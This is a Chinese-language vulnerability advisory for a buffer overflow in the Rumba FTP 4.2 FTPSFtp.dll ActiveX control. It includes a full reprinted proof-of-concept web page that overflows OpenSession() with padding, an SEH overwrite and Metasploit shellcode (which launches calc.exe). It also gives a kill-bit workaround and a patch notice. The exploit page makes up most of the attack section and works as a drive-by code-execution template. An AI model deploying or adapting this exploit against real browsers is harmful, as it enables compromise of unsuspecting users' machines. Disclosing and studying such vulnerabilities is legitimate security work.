Rumba FTP客户端FTPSFtp.dll ActiveX控件缓冲区溢出漏洞

受影响系统:

NetManage Rumba FTP 4.2

不受影响系统:

NetManage Rumba FTP 4.2.3

描述:

Rumba FTP是一款图形化的FTP客户端。

Rumba FTP客户端所安装的FTPSFtp.dll ActiveX控件没有正确地过滤提交给OpenSession()方式的字符串参数,用户受骗访问了恶意网页并向该方式传送了超长参数就可以触发缓冲区溢出,导致执行任意指令。

<*来源:sinn3r (x90.sinner@gmail.com
  *>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

<html>  

<head>  

<title>Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Buffer Overflow by sinn3r</title>  

</head>  

<body>  

<object classid="clsid:677A6F83-52A0-4931-8E62-EC713EE9B949" id="ftpsftp"></object>  

<script language="JavaScript">  

// http://www.metasploit.com  windows/exec cmd=calc.exe 200 bytes  

shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPM"+  

            "YZEVQN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWK"+  

            "RZPPRQGLKQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9"+  

            "FFQKOVQO0NL9QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN"+  

            "3LKS4LKC1XPMY1TWTGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1L"+  

            "KROLGKON5OKZPNUORF6RHOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE35"+  

            "12LSS6N3U2X3UUPDJA";  

  

eaxAlign  = unescape(  

"%58"+      //POP EAX  

"%04%0B"    //ADD AL, 0x0B  

);  

  

// Original fuzzed size = 13332 bytes. This POC uses 5000 bytes.  

var padding1    = unescape("%41");  

while (padding1.length < 600)  

    padding1 += unescape("%41");  

var nseh    = unescape("%EB%06%42%42"); //Short JUMP  

var seh     = unescape("%71%33%6E%74"); //0x746E3371  msls31.dll  <– IE 6 addr  

var padding2    = unescape("%41");  

while (padding2.length < 4389-shellcode.length)  

    padding2 += unescape("%41");  

  

ftpsftp.OpenSession(padding1 + nseh + seh + eaxAlign + shellcode + padding2);  

</script>  

<pre>  

|——————————————————————|  

|   Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Overflow   |  

|                                                                  |  

| by sinn3r – Corelan & Exploit-DB             twitter.com/_sinn3r |  

|——————————————————————|  

  

This bug was found when I was verifying another bug for Exploit-DB. Please note that  

the latest version of FTPSFtp.dll v4.2.3.0.0 is no longer vulnerable to this, and it  

is (duh!) recommended to update your Rumba FTP to the latest version if possible.  

  

[+] Vulnerable Component = FTPSFtp.dll  

[+] Version              = 4.2.0.0  

[+] Function:            = OpenSession ( ByVal __MIDL_0011 As String ) As Object  

[+] progid               = FTPSFTPLib.SFtpApplication  

[+] Tested on            = Windows XP SP3 ENG + IE 6  

[+] Payload              = windows/exec cmd=calc.exe  

[+] Special thanks       = rAWjAW and chap0 for testing  

</pre>  

</body>  

</html>

建议:

临时解决方法:

* 为clsid 677A6F83-52A0-4931-8E62-EC713EE9B949设置kill bit。

厂商补丁:

NetManage
———
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.netmanage.com

发表评论?

0 条评论。

发表评论